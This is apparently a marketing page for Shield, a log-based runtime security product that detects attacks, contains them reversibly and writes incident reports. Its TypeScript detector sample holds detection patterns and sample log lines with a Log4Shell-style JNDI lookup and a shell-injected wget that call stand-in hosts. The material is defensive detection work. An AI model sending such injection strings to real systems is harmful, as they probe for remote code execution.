Secure everything,
compromise nothing.

Runtime security for every service on BuildWithLocus — protecting you from attacks that exploit the gaps in your own code. Detect them live in the log stream, open AI-authored incident reports, and contain the blast radius automatically, through the deploy API you already use to ship.

01 · Detection

Read every log line.
Score in milliseconds.

Shield watches live log streams, matches against a curated indicator library, and opens incidents only when severity crosses a category threshold.

shield.live — Detection stream (live incidents)
CRITICAL · demo-target · 3:30 AM · Malware payload fetch detected — scale-to-zero fired.
HIGH · demo-target · 3:29 AM · RCE probe frequency exceeded threshold.
MEDIUM · demo-target · 3:28 AM · SQL UNION injection signature in query error.
LOW · demo-target · 3:27 AM · Scanner probe volume on /.env, /.git/config.

  • Observability
    Every matched line captured with timestamp, category, and IOC id.
  • Compiled once
    One composite alternation per category. Zero analyst cost on the hot path.
  • Sliding severity
    60-second windows with category-specific thresholds.
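
The detection loop described above, as an added example that is not Shield's own code: one alternation compiled per category, each matched line recorded with timestamp, category and IOC id, and a 60-second sliding window with a per-category threshold. The indicator ids, patterns, thresholds and log lines are constructed assumptions.

```typescript
// Constructed library and log lines: ids, patterns and thresholds are assumptions.
type Category = 'rce_probe' | 'scanner_probe';
const LIBRARY: Record<Category, { id: string; pattern: string }[]> = {
  rce_probe: [{ id: 'ioc-jndi', pattern: '\\$\\{jndi:' },
              { id: 'ioc-shell-fetch', pattern: ';\\s*(?:wget|curl)\\s' }],
  scanner_probe: [{ id: 'ioc-dotenv', pattern: 'GET /\\.env' },
                  { id: 'ioc-git-config', pattern: 'GET /\\.git/config' }],
};
const THRESHOLD: Record<Category, number> = { rce_probe: 2, scanner_probe: 3 };
const WINDOW_MS = 60000;
const CATEGORIES = Object.keys(LIBRARY) as Category[];
// Compiled once: one alternation per category, one capture group per indicator
// (patterns use only non-capturing groups), so the group index names the IOC.
const COMPILED: Record<string, RegExp> = {};
for (const c of CATEGORIES) {
  COMPILED[c] = new RegExp(LIBRARY[c].map(i => '(' + i.pattern + ')').join('|'), 'i');
}
class Detector {
  matches: { ts: number; category: Category; iocId: string }[] = [];
  private hits: Record<string, number[]> = {};
  // Returns the categories whose 60-second hit count reaches threshold on this line.
  ingest(ts: number, line: string): Category[] {
    const opened: Category[] = [];
    for (const c of CATEGORIES) {
      const m = COMPILED[c].exec(line);
      if (!m) continue;
      let g = 1; while (m[g] === undefined) g++; // first group that participated
      this.matches.push({ ts, category: c, iocId: LIBRARY[c][g - 1].id });
      const recent = (this.hits[c] || []).filter(t => ts - t < WINDOW_MS);
      recent.push(ts); this.hits[c] = recent;
      if (recent.length === THRESHOLD[c]) opened.push(c); // fire on crossing only
    }
    return opened;
  }
}
const SAMPLE: [number, string][] = [ // [timestamp in ms, log line]
  [0, 'GET /.env 404'], [5000, 'GET /.git/config 404'],
  [20000, 'GET /?q=${jndi:ldap://example.invalid/a} 400'],
  [70000, 'GET /.env 404'], // both earlier scanner hits have aged out
  [75000, 'GET /?x=1; wget http://example.invalid/b 400'],
  [80000, 'GET /.ENV 404'], [81000, 'GET /healthz 200'],
];
function runSample() {
  const d = new Detector();
  const incidents: string[] = [];
  SAMPLE.forEach(([ts, line]) => d.ingest(ts, line).forEach(c => incidents.push(c + '@' + ts)));
  return { incidents, iocIds: d.matches.map(m => m.iocId) };
}
console.log(JSON.stringify(runSample()));
```

On the sample, the two RCE indicators land 55 seconds apart and open one incident, while the four scanner hits never put three inside a single window and open none.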
02 · Containment

Safety-first by construction.

Automated response is limited to reversible moves. Anything that destroys forensic state requires a human on the button.

response/contain.ts
// 1. Scale-to-zero — reversible, instant
await endpoints.scaleToZero(service.id);

// 2. Rollback if a healthy prior deploy exists
const { deployments } = await endpoints
  .listDeployments(service.id);
const prior = deployments.find(d => d.status === 'healthy');
if (prior) await endpoints.rollback(prior.id);

// 3. Audit every action — typed + traceable
await audit.write({
  incidentId,
  actionKind: 'scale_to_zero',
  actorKind: 'agent',
});
  • Scale-to-zero
    High-severity incidents park the container via the deploy API.
  • Reversible
    Rollback to the last healthy deploy when one exists. No data loss.
  • Human-gated
    Rebuild, rotation, teardown — all require explicit approval.
03 · Reporting

Post-mortems write themselves.

Every confirmed incident gets a structured report: classification, timeline, remediation checklist, and a suggested new indicator.

incidents/01h9m2 — Report
Incident report · generated 2s ago
Botnet RCE probe campaign
Classification: Mirai-family commodity botnet scanning for Log4Shell and shell injection. Likely pre-exploitation reconnaissance; no successful execution observed.
Attack type: rce_probe + malware_deploy
Confidence: High (9/10)
Immediate actions:
  • Confirm scale-to-zero held — no outbound traffic on monitor.
  • Snapshot last 50 evidence lines for forensic review.
  • Rotate credentials present in matched stack traces.

  • Structured
    JSON output via schema validation. One call per incident.
  • Checklist
    Immediate, short-term, preventive. Copy as Markdown.
  • Learning library
    Each report suggests one new indicator. Approve to add it.
Complete coverage

Right signals. Right response.

Shield covers the full lifecycle — from runtime log detection to reversible containment to structured incident analysis — all on BuildWithLocus primitives.

01

Real-time detection

Pattern-matched at log-stream speed. Six attack categories in a curated library. Regex-first; no analyst cost on the hot path.

02

Reversible containment

Scale-to-zero fires automatically. Rollback when a healthy prior deploy exists. Destructive actions wait on human approval.

03

Automated reports

Analysis runs only on confirmed incidents. Structured output, bounded context. Every report suggests one new indicator to learn.

The shape of it

Measurable by design.

Watching for: RCE probe, Malware deploy, Secret exposure, Brute force, SQL injection, Scanner probe


Ready to watch? Sign in to the live demo or start monitoring your own services.

Bring your claw_ key and Shield picks up every service in your workspace in under sixty seconds. No agent install, no sidecar, no kernel module.

BuildWithLocus

Built on Locus primitives. Shield uses SSE log streams, instant rollback, and scale-to-zero — the same deploy API you can wire up in minutes.
